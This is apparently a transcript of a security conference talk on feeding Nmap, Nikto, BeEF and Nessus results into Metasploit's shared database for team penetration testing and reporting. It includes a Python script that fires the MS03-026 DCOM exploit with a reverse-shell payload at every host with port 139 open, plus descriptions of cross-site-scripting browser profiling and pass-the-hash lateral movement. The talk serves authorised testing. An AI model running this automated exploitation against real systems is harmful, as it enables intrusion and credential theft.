Good morning. Thanks for coming out. I hope everybody had a good evening and is rehydrating now. Welcome to Multiplayer Metasploit: tag-team pen testing and reporting. I'm Ryan Linn. I'm an information security engineer for SAS Institute, and I play around with Metasploit for fun. So this isn't my day job, but I think it's a great time. We're going to start off by talking a little bit about why we did this and why I think this is a really cool thing, talk about what solutions are out there currently, talk a little bit about how all of the communication happens, and discuss the types of objects involved. And I'm probably going to do the demos early, to make sure we get to see the fun stuff first.

The reason I started working on this is that when I was doing pen tests with other people, it was hard to organize information. We have wikis, we have Dradis, we have all sorts of other things, but it all requires good attention to detail from the people working. If you have results and you're multitasking and you don't upload them right away, you can have people waiting for data, and you can have people with incomplete data. Overall, in a team environment, especially when people are in separate physical areas (you may have one person testing remotely and one testing locally, or even people in different rooms of the same building), it's hard to make sure you have all the coordination there.

So it occurred to me that Metasploit has a really powerful database back end. The problem is that it's hard to get to that information right now: unless you're sitting in front of the console, pretty much one person can work on it at a time. What was missing for me is this: I use a lot of the XML-RPC capabilities, which let you remotely talk back and forth to Metasploit, but there wasn't a database module. So I said, okay, fine, I'll write one. I went ahead and made it so that remotely you can talk to Metasploit, push data in, and get data out. Now that I had that part, I wanted some good ways for my applications to talk in. You're going to see three examples today. The first one is Nmap. The second is Nikto. And the third is BeEF.

Our goal is this: instead of running tasks and then uploading stuff when you're done, what if your scanners logged their data directly into Metasploit? At that point, you have real-time, actionable information in Metasploit. As you go through your process, you're not waiting on other people, and you're not wondering, hey, is this information complete or not. There are programmatic things you can do to find out whether someone has started a task or completed one, and what the status of the data in the database is. And as you start building profiles (for instance, most scans start at low IPs and go to high IPs), once you have a couple of different types of scans running, you can already be looking at information from the first parts of a scan before the scan is even finished. So that's the basic problem.

The other piece is reporting. (Holy crap, you guys want to riot too? No.) Basically, one of the problems is, once you have all this data, how do you get a delta from one test to another?
We already have all the data in the database, so programmatically it should be pretty easy to say: tell me what's different from the time before. Also, there's no easy way to automate reporting once you get all this data into Metasploit. You can look at your hosts, you can look at what exploits ran, you can look at all that. But how do you dump out a report that says: this is what I did, this is what time it was, this is what got me shells back, and this is what didn't? You're relying a whole lot on the people doing the pen test being really scrupulous about what information they write down. Also, if someone comes to you and says, what happened at this time? It's nice to be able to go, okay, let me look at this specific time period and say, these were the tests we were running right then, and to have all of that in a central location.

Right now, I think Dradis is one of the strong alternatives. But the problem there is, back again: we're running tasks, then we're putting data into the database, and then we can sort of correlate. It's all people having to be very diligent about uploading things as soon as they're done getting results. You don't have any real-time analysis. And especially if you have long-running scans, or scans with multiple pieces, it's not necessarily easy to put all that back together and get a comprehensive view of what you've got. Leo I included because it's on the BackTrack CD, so I know a lot of people are familiar with it, but it's really geared for one person, not for multiple people. And wikis are cool, but they're really arbitrary, so you have to be very good about having a librarian to keep all your information together.

Since Metasploit is really accessible (I think probably everybody knows where to get Metasploit), I decided to extend the XML-RPC stuff to facilitate the database transactions. This is something Metasploit Express already does, but it does it through other methods, and I don't have money, so I thought this would be a good way for me to get the same information. I just went ahead and created a database module and then started figuring out what extra pieces I needed to add for it to be useful to me. The XML-RPC extension allows the central logging of all the information, but the most important thing for me is that all this information is actionable. When you're pulling vulnerabilities in, when you're doing all of the scanning, everything you have available is information you can run Metasploit modules against, information you can query from other applications to perform further tests. Overall, it gives you a central store where applications can push and pull data, so you have very up-to-date information available to your applications and your testers.

So instead of going through all of that first, I'm going to start off just showing you some stuff, because that's a lot more fun, I think, and then we'll talk about how it works for people who are interested. The first thing I want to show you: last year I released a tool called Nsploit, which allows you to launch attacks from Nmap and use Metasploit on the back end to actually perform the attack.
As Nmap is going through, it can call an Nmap Scripting Engine script that goes out, talks to the Metasploit database, and has Metasploit launch an attack on Nmap's behalf. Along those lines, most people probably don't want to just start throwing exploits out there. But the Nmap Scripting Engine is very powerful. It has port rules, which allow us to say: if a port is open, or in a certain status, fire a job. The job we're firing in this case comes from code I've added to Nsploit this year to talk directly to Metasploit and add hosts into the database.

The first thing we're going to do is start up msfconsole. I've created a little RC script here (a sketch of it appears at the end of this segment) that starts off by connecting to the Metasploit database as the user msf to the database msf. Metasploit is moving toward Postgres; for a while you were able to use SQLite3, but as the product becomes more powerful, you really want to look at switching to Postgres, and Postgres is on BackTrack, which makes it a lot easier. So we connect to our database back end using the user ID msf to the database called msf. Then we load the XML-RPC module using our elite password of abc123. The ServerType option is important. For a lot of what I'm going to show, I'm using the web version. There's also a raw version, but ServerType=Web matters because it allows us to communicate with the server over HTTP using XML-RPC, and with a lot of the tools that are out there, that makes things really easy. If you use the traditional server, that's null-terminated raw XML-RPC, and you have to write some transforms for your code. So we're using the web version because it's easy and I'm lazy.

We'll go ahead and start this up, and as it goes through, you'll see the database creating objects. Actually, let me make this bigger so you can actually see the database creating objects. Can people in the back see that? Maybe? Yes? Okay. Well, if you can't, then wave at me and I'll fix it. We'll make this a little bit larger as well.

Okay, so what I've done, through Nsploit, which again is a series of NSE libraries and scripts for the Nmap Scripting Engine, is basically just run a raw scan. Once you have Nsploit installed, the Metasploit scripts for actually adding the ports are set to run by default, so if you install it into your distribution, it will go ahead and try to add stuff for you as it can. We just have to do an nmap -A and type in the right address, and we start scanning our local little network up here.

Back here, I have a listener for the XML-RPC channel. One of the things you'll notice is that for Nmap, we're actually going to have data flowing through XML-RPC into our database before Nmap even puts the data on the screen. We'll have more up-to-date information in our database than Nmap is presenting on screen as we're scanning. That's, I think, one of the pluses: as you go through a scan with Nmap, especially for longer stuff, you're going to have actionable data in your database before any of this other output has happened. So there's Nmap sending all of its wonderful goodness into the database, and you can see it hasn't actually printed anything to the screen yet. We now have hosts that we know about, and we're just now seeing some output on the screen.
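For reference, a resource script along the lines of the one described above might look like this. This is a reconstruction from the description in the talk, not the exact demo file, and the db_connect and xmlrpc option syntax shown is an assumption based on Metasploit 3.x conventions:

```
# demo.rc: connect to the msf database, then expose it over web XML-RPC
db_driver postgresql
db_connect msf@127.0.0.1/msf
load xmlrpc Pass=abc123 ServerType=Web
```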
I'm going to let this run for a second while I talk about the next part. The next thing I wanted to do was get some vulnerabilities in, to get a better picture of how all of this fits together, and to be able to look at a whole host and figure out what vulnerabilities and what other actionable information we have. I chose Nikto because I do a lot of web stuff, and I created a new report type for Nikto that adds vulnerabilities to the database as Nikto is scanning.

Now that we're done with the Nmap scan, we can look at our hosts, and we have all of our host information and our services. As part of the scan, we discovered that we have a server here listening on port 80. So let's go over to Nikto and look at exactly what vulnerabilities it might have. Our format for Nikto is right here. Basically, we've created a new reporting format. I'm going to be releasing all this code on Monday on my blog; the new format requires just a little patch to Nikto and will hopefully be in the distribution within the next month or so. We specify our output file (the -o option) as our username, colon, password, at the URL for our RPC listener through Metasploit. Metasploit listeners are on 55553 by default and, for the HTTP version, use an RPC directory of /RPC2. (A sketch of this invocation appears just below.) We choose our host, 192.168.1.254, and we'll just watch it start scanning, and then we can look at that information going directly into the database.

With Nmap, it has to do a bit of work before it actually starts running scripts: while it's doing the port scans, we're not getting that data back, but as soon as Nmap starts the script portion of its scan, it puts data into the database. With Nikto, it starts pretty early, so we already have vulnerabilities in our database, and as it continues to add them, we can see that number increasing. One important thing to note, though: there's not a whole lot of data here that looks very meaningful. The reason is that most of the time when people use Metasploit, they look at the vulnerability references, because those are what get you the exploit modules you can use to further gain access to hosts. But all of this data is actually stored in the database, so we're going to be able to get more data out of Metasploit than what is traditionally printed to the screen, through some of the reporting capabilities we have. As this finishes, we now have all of our vulnerabilities pushed in, and as you can see, we have a couple of different vulnerability references.

The next thing we want to do is look at how to use this for reporting. Right now we have some hosts in here, and if we want a full picture of what's going on, we can look at db_hosts and say, okay, we can find our host, it's alive, and we know when it was added. We can go over to db_services and match that up with the information we have. Then we go over to db_vulns, and, okay, that's not necessarily the easiest way to get at all this. So instead, I wrote a host info script, which lets us pull a full profile for a host we have in the database and get all the information out.
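Here's roughly what that Nikto invocation looks like, as described above. Treat it as a sketch: whether the patch also needs an explicit format flag isn't stated in the talk, so only the -h and -o pieces are taken from the description:

```
# report results straight into Metasploit's web XML-RPC listener
./nikto.pl -h 192.168.1.254 -o msf:abc123@http://127.0.0.1:55553/RPC2
```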
There are four core pieces of information that Metasploit stores about hosts. We've got the host information itself, which is things like when the host was discovered, whether it's up, all that stuff. Service information, which is the basic stuff we get back from Nmap: what the services are, whether they're up, all that goodness. Vulnerabilities, which pretty much map a host and service to a vulnerability type and store a little bit of extra data on that. And notes, which are general-purpose storage; you can put pretty much anything in a note that you want to retrieve later.

The host info script that will be in the source I distribute can pull the full listing of everything in the database about a specific host. Let me change this to the host we were actually scanning. We basically specify the username and password for our XML-RPC destination and the IP address we want information for. This is just some quick and dirty Python, and I'll go over how the code works in a couple of minutes. From here we have all of our basic information: the basic Nmap information about when the host was first discovered and last discovered. That's important because, if you've run multiple scans or something like that, you can see which scan something went in on. Then there's the port information about what ports were found. You'll notice there's no OS listed here. Typically, if you have a couple of ports open and a couple closed, you'll get some OS information, but there weren't enough ports open to identify this host for sure, so I don't include it here. For vulnerabilities, if you remember, the Nikto output was a lot more verbose; here's that verbose output, and we're getting it directly from the Metasploit database. So we have all of that data from before, and this helps us aggregate it.

Where this is valuable: you have multiple pen testers working on multiple things, and each person is probably concentrating on one or two things at a time. This lets you go into the database, pull everything you know about the specific target you're looking at, and immediately have all the relevant data for that host in one little report, instead of having to go to multiple places, and possibly multiple documents, to get the information you need to make actionable decisions. So this just goes through the list of vulnerabilities. There are no notes for this host, so none are included here.

The third thing I did was for BeEF. One of the things you can do with it is really build host profiles from everything you learn about a host while you're running BeEF. For people who may not be familiar with it, BeEF stands for the Browser Exploitation Framework, and it allows you, through cross-site scripting, to encourage a target browser to execute code on your behalf. So basically, we can encourage the browser to run some fingerprinting on itself, log that into the Metasploit database, and over time start building a profile of, for instance, a company intranet, just based off a cross-site scripting vulnerability. Let me pull that information up. What I've done is, as BeEF goes through and gathers data, it logs it into the database.
But also, as you pull zombie reports, BeEF pulls out any information in the database that you have about that host. So when you're looking at a host in BeEF, you actually have all the actionable information you may need to do real work with it. This is the front end for BeEF. I've got a happy little Windows box over there running our sample cross-site scripting, and as we can see, we just had a zombie pop up. To start off with the basic information, we can go into our zombies and pull everything we already know about this host. This is all the basic stuff BeEF normally logs: what the browser is, what the operating system is, the resolution, all that good stuff, plus a little bit of information about the page it's on. All of this information is now logged into Metasploit.

So offline we can get to all of this, but more importantly, if you have a couple of people accessing the company intranet page, you may be able to tell a lot more about what's going on with the company just based off this portion right here, which is the HTML that was on the vulnerable page as the person was looking at it. You can get a whole lot more information, especially if you're testing, say, an HR app: you could really have the potential of mining more information, and of showing that the HR app has vulnerabilities, by actually showing people what each person was looking at on that page.

So now you have all this delicious information and you want to gather more about a host. We can click on our zombie, go under our standard modules, and find out if it's got Java or whatever. We'll select it and hit send to determine whether the host has Java installed. You'll see over here that the module code was sent and that Java is available, and when we come back over to our zombies, we can see that both here in our module results and also here in the Metasploit information. You can also come back over here and see we now have a bunch of notes about that host. So all of this is pulling data back and forth and really merging things together.

Again, for the BeEF portion: if we were to have an internal host drop a little bit of JavaScript as some stored cross-site scripting, we could really build a large profile of an organization: what types of browsers they're using, and, through BeEF's autorun plug-in portion, what applications are installed in the browser, things like that. If you're interested in doing further social engineering or further testing, you'll have a better idea of what software may or may not succeed. This lets you build a much stronger profile of an organization from a different perspective than what your typical scanning gives you.

The last demo: right now we have some vulnerabilities in, but most people are not going to want to just run Nikto. Most people are going to want to run Nessus or Qualys or something like that. Metasploit already supports a couple of different file formats, including NeXpose, Qualys, and Nessus, and I think there may be one or two others. But remotely, it's not easy to push that data back into the database.
So I wrote a quick script that takes a file we have from Qualys or Nessus or whatever and inserts it into the database, so that we have all of our data in one place. Again, I'm doing all of this locally right now, but the whole point of this presentation is that you can do this with multiple people from multiple locations and have it all centralized back to one place. You don't have to do it from localhost. So we come back over to this window: I have this import file script and some happy little NBE files. The import script takes pretty much the same stuff as the host info script: our XML-RPC location, our username, and a file, which will be the illustrious test2.nbe, and we go ahead and upload it. We've now uploaded our Nessus information. We look at db_vulns again, and all that information is in there now. So now we can pull another report; that one was for the .236 host, and based off that Nessus data, which was completely different from the Nmap data, we now have all of the same information we were able to get before. That really allows everything to come together nicely.

At this point, I'm going to talk about code and how it all fits together, for people who are interested. There are a couple of different types of objects involved here. The first is workspaces. A workspace sets a chunk aside for the project you're working on. Where workspaces become nice is if you're doing a pen test of the same company multiple years in a row: you may be interested in pulling in your database from last year, opening a new workspace, and then, as you look at changes between the two years for things that have hopefully improved, comparing the two workspaces programmatically to determine what has changed and what hasn't. The host is pretty self-explanatory, and then there are services, vulns, and notes, which I'm going to go into a little deeper for just a second.

Workspaces are pretty much just labeled by name, and the name is arbitrary. A workspace keeps some information about when it was created, and there's a description field to let you give it a more descriptive label, like "Ryan's pen test from 2009." Hosts have a lot more information in them: all sorts of information you get from Nmap, like the name, exactly what flavor of OS it is, and the address, and there's actually a separate field for IPv6, so you can look at a host in the context of both its IPv4 and IPv6 addresses. For services, each service maps to a host and includes the port, the protocol, and the state. It also has some name information about what that service is, and you can drop in extended information, for instance full banners and things like that, which you can pull back later. The vulns table is actually relatively small. It has a reference to a host and a service, the name of the vulnerability, references (OSVDB, CVEs, or whatever) that relate to it, and then an info block where we store all of that extended information, like the full text of vulnerabilities. Notes are pretty cool, because if you have something that's not a vulnerability but you want to keep track of it, you do that with notes. Notes have a note type, which is essentially arbitrary.
If you're developing something new and want to keep track of it, you can create your own note type. Notes pertain to services and hosts. They have a critical flag and a flag for whether or not they've been seen before, and then a data block where you can store pretty much anything you want. Most of the time, objects are stored there, so you can actually keep extended information about what you found. For instance, if you're storing information about virtual hosts you found on a server, you can include an array of vhosts in that object and have all of that accessible when you go through and pull your reports.

Events are important for figuring out what's going on on the system. Every time you type a command, an event is logged. You have the host it came from, the name, whether or not it's been seen, the username, and then the extended info describes what really happened. So if you have multiple people acting on the database and you're wondering who's doing what, or whether a scan has started or finished, you can log event information when scans start and finish and tell in real time what the status is and what people are working on.

Then we have loot. Loot is mostly used by Metasploit Express and the more commercial products, but we have it available to us as well. Loot is basically anything you've acquired from the host that you find valuable. We don't necessarily store the content in the database, but we have the host and service information and the type of the stuff we acquired, and then the path variable says where to find it. So if you have a secure shared storage area where you put all the goodies you've acquired, for instance cracked passwords and things like that, you put the path to that there. The data field has some extended information about what that information is, the content type says exactly what it is, and then you have a name just to keep track of it.

Clients are what we're using for BeEF. For all of the web stuff, we keep track of a couple of different pieces of information as hosts come in. This information is also stored by things like db_autopwn and any of the other web parts that come in. We get information about the host and the full user-agent string, but we also get some parsed-out user-agent information, like the name and the version. So if you're looking at performing further testing on an older version of IE, this becomes very handy: you can just query all of our hosts running an older version of IE and then send them a little file to test out.

For users, the user information isn't always directly visible, but we can view it. It's created automatically. There's a plug-in that will let you get to it from the console, but through XML-RPC we can get to it regardless. So we can store data here even when Metasploit itself isn't storing data here. As we go through and acquire credentials, we have the ability to log all of them for action in the future. This is especially valuable if you're wanting to do things like pass-the-hash: we've got all of the tokens and things like that stored here, to be able to further gain access on the network.

I have a little bit more time, so I'm going to actually go into some of the code itself at this point. The code for a lot of this is fairly simple.
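As a taste of how simple, here is a hypothetical sketch of pushing one of those notes in remotely with Python 2's xmlrpclib. The db.report_note call and its argument names are assumptions modeled on the database API described in this talk, not lines from the released code:

```python
import xmlrpclib

# connect to the web-mode XML-RPC listener from the earlier demos
server = xmlrpclib.ServerProxy('http://127.0.0.1:55553/RPC2')

# authenticate; a successful login hands back a token for later calls
token = server.auth.login('msf', 'abc123')['token']

# file a note against a host; the note type is arbitrary, and the data
# block can carry structured data (here, a made-up list of vhosts)
server.db.report_note(token, {
    'host': '192.168.1.254',
    'type': 'web.vhosts',    # hypothetical note type for this example
    'data': ['intranet.example.com', 'hr.example.com'],
})
```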
I'm using Python because Python has an XML-RPC module that makes working with this stuff very easy. I'm going to start off by looking at just the host info script. All of this stuff up top is just parsing options: from the options that get passed in, we need a server URL to connect to, and the username and password to authenticate to XML-RPC.

For XML-RPC, there are a couple of pieces of information that are really good to know when you're writing applications. The first is that after you authenticate, you're given a token. That token is good for 15 minutes, and you pass it in with every subsequent request you make. After 15 minutes, you won't get anything back except errors from Metasploit, so you have to make sure you're renewing your tokens every 15 minutes. Occasionally, when I've had slowness and things like that, I've ended up with tokens appearing to expire before the 15-minute mark, so typically when I'm writing stuff, I renew my tokens at the 10-minute point.

So right here, we open an RPC connection to the Metasploit server. Then we call the auth.login function, passing our username and password, and we get back our token. Pretty much all of the calls come back with a result if it's an action you're asking it to perform; if you're asking for data, you don't get a result back, you just get data. Since we have a result back, we know we were successful, and we take the token from that and use it for the rest of what we do. After that, we define our workspace: if we're looking at a specific workspace, we go ahead and assign that to our extra options. And after that, we just start asking for stuff and printing it out. The get-host call says get all of the hosts we specified on the command line, and after that it's just a matter of enumerating through and printing stuff out. For services, we just drop into a loop and print out each piece of the object at a time. So it's not overly complicated. There's not a lot of documentation on exactly what's being returned right now; there's a wiki page for Metasploit, which I'm going to start updating as soon as this makes it into the trunk, covering what information comes back from which pieces, so that there's a good reference for it. As far as the other functions go for XML-RPC, in the documentation subdirectory there's an xmlrpc.txt that has a list of what you pass to each one of the functions. Sorry, this is a little bit of a pain to read, but basically we're just iterating through stuff and printing out each piece of the object in order.

Where this is especially valuable is when you want to perform further actions on stuff that you've found. So, dcom.py: I wanted something where I could test and make sure it's working, and DCOM just about always works on XP Service Pack 0 boxes, which is the awesome box I've got up here, so for testing it makes things really easy. To only send the exploit to hosts that have the right stuff listening, we specify our information about where to connect up here, connecting to our localhost and logging in. Then we get a list of all of our services running on 139 TCP, and from there we can make sure that, as we're calling stuff, we're only calling hosts that are relevant.
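A minimal sketch of the pattern just described (log in, hold on to the token, query the services table) looks something like this. The option and result keys for db.services are assumptions, so check them against the xmlrpc.txt documentation mentioned above:

```python
import xmlrpclib

server = xmlrpclib.ServerProxy('http://127.0.0.1:55553/RPC2')

# auth.login returns a result plus a token; the token gets passed to
# every later call and expires after 15 minutes (renew around 10)
res = server.auth.login('msf', 'abc123')
if res.get('result') != 'success':
    raise SystemExit('login failed')
token = res['token']

# pull every service the database knows about on 139/tcp
resp = server.db.services(token, {'ports': '139', 'proto': 'tcp'})
for svc in resp['services']:
    print '%s:%s %s' % (svc['host'], svc['port'], svc['state'])
```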
From there, if you're going to do stuff like this, a lot of the time you're better off using multi/handler than the default handler for the exploits. For people who may not be familiar with multi/handler, it acts as the handler for the exploits themselves, so you can have a whole bunch of different reverse TCP connections coming back to the same place, and you don't have to worry about any sort of conflicts with ports or anything like that. So I do two things here. First, I start off by running multi/handler, so that any connections come back to the multi/handler instead of the payload handler for the exploit itself. Then I pull the list of services, and for each service listening on port 139, I run call_exploit on it, which just does a basic execute of our exploit using our authentication token; in this case, the windows/dcerpc/ms03_026_dcom vulnerability. For this, we just have to specify the IP address of the remote host that we pulled, the payload we want to use, our IP for the connect-back, and then, importantly, DisablePayloadHandler, which is what actually turns off the exploit's own payload handler. This also increases the speed as stuff goes out, because your exploit won't be waiting for something to connect back to it; it sends the goodness out and then waits for the target to connect back to the multi/handler.

So here we have a couple of things running on Microsoft ports. We should be able to just come over here, run our dcom.py, and it pulls the hosts that are in the database; now we have remotely called the exploit, gotten back our host, and we have all of the goodness we may want.

With something like this and with psexec, one of the nice pieces is this: say you have gotten one host, you've captured some credentials, and you want to see which other hosts in the network you may be able to get additional tokens on for pass-the-hash. With psexec, you can go through, put in the credentials you have right now, start scanning the network, and then use Meterpreter's autorun capabilities to do further information gathering as you go through the network. You may want to do something along the lines of winenum, which, as it connects into the host, runs in your shell, comes back, and pretty much profiles everything about the host. As this goes through, you can start looking at further elevating privileges using the information from there, and you'll also get a much better network map as you go.

The plus side is, because we have already done an Nmap scan and we know which hosts are listening on Windows ports, we're only going to send this stuff to Windows hosts. So if there's some sort of network anomaly-based detection looking for traffic on Microsoft ports to Linux boxes or whatever, you're not going to trip it. You also make sure that if you're limiting your scope, you're only doing things that apply directly to your scope. One script that might make sense for the future, for people interested in making sure that everything actionable stays inside certain ranges, would go through, look at what all is there, and delete everything out of the database that's outside of their scope.
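In that spirit, here's a sketch of the dcom.py flow: start one multi/handler, then call module.execute per host. The module.execute shape here matches the standard Metasploit RPC interface as best it can be reconstructed, the db.services keys are the same assumptions as before, and the LHOST value is a placeholder:

```python
import xmlrpclib

server = xmlrpclib.ServerProxy('http://127.0.0.1:55553/RPC2')
token = server.auth.login('msf', 'abc123')['token']

PAYLOAD = 'windows/meterpreter/reverse_tcp'
LHOST = '192.168.1.10'    # placeholder attacker IP

# one multi/handler catches every session, instead of per-exploit handlers
server.module.execute(token, 'exploit', 'multi/handler', {
    'PAYLOAD': PAYLOAD,
    'LHOST': LHOST,
    'ExitOnSession': False,
})

# fire ms03-026 only at hosts the database says have 139/tcp listening
resp = server.db.services(token, {'ports': '139', 'proto': 'tcp'})
for svc in resp['services']:
    server.module.execute(token, 'exploit', 'windows/dcerpc/ms03_026_dcom', {
        'RHOST': svc['host'],
        'PAYLOAD': PAYLOAD,
        'LHOST': LHOST,
        'DisablePayloadHandler': True,  # the multi/handler takes the shell
    })
```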
As far as the input side goes, right now I just have it adding ports. But one thing that would be really cool is for the Nmap developers, as they write checks for extended information about shares and all the other goodness that's involved, to be able to drop notes through this, so that as you're scanning, every piece of information that shows up in the script portion of Nmap gets logged.

So let's look a little bit at the Nmap side. The latest version of Nsploit will run in a lot more places. Last year when I released it, it required an additional Lua module; now it's straight XML-RPC and requires nothing else. So it should run on iPhones; it should run on any sort of device that you can put Nmap on that has the Lua stuff installed for scripting. When you drop it in, you've got two separate directories: your nselib and your scripts. My Nmap is installed in /usr/local, so if you look in /usr/local/share/nmap, you'll see the two directories that correspond to nselib, which holds all of the core libraries the other scripts use, and the scripts themselves. Pretty much, you copy everything from nselib in the Nsploit distribution over to nselib, and everything from scripts to scripts.

When we look in the scripts, we have msf_addport. There are two separate pieces to it. The port rule says when the script should fire, and we've said it should fire whenever Nmap finds a port in the open state. The action, when it fires, starts off by initializing the Nsploit stuff. For Nsploit, you have a file in your home directory with all the information about where to connect to; otherwise you'd have to pass a whole lot of information to Nmap, and that's not a lot of fun, so the config file ends up being a lot easier. The msf_init call pulls your values in. Then we specify our options from the things Nmap has found for us: our host IP, our port number, protocol, and so on. From there, we can just issue an msf_call directly to the XML-RPC API function. The library goes ahead and takes care of the token handling for you, and the reason for that is that Nmap has a storage area where we can deal with that a lot more easily than any of the individual scripts could, so I take care of all of that in the Nsploit library. Pretty much all you have to pass is the function you want to call and the options. This goes out, connects to the Metasploit database, adds the data, and comes back. And a lot of this stuff has the ability to run in parallel.

So I'm getting close to the end. Thanks very much; I've had a great time here. Thanks to all the people who've helped me get stuff going, and especially to the people who've written the tools that I'm leveraging, especially the Metasploit guys, and Theodore and Wade Alcorn, who've helped me a lot. So thank you guys very much. Here's my contact information. If you're interested in more, let me know. Hit up my blog, probably Monday evening, and I'll have all the source code there, and I'll try to get the slides up too. If you have any other questions, please just let me know. Thank you very much.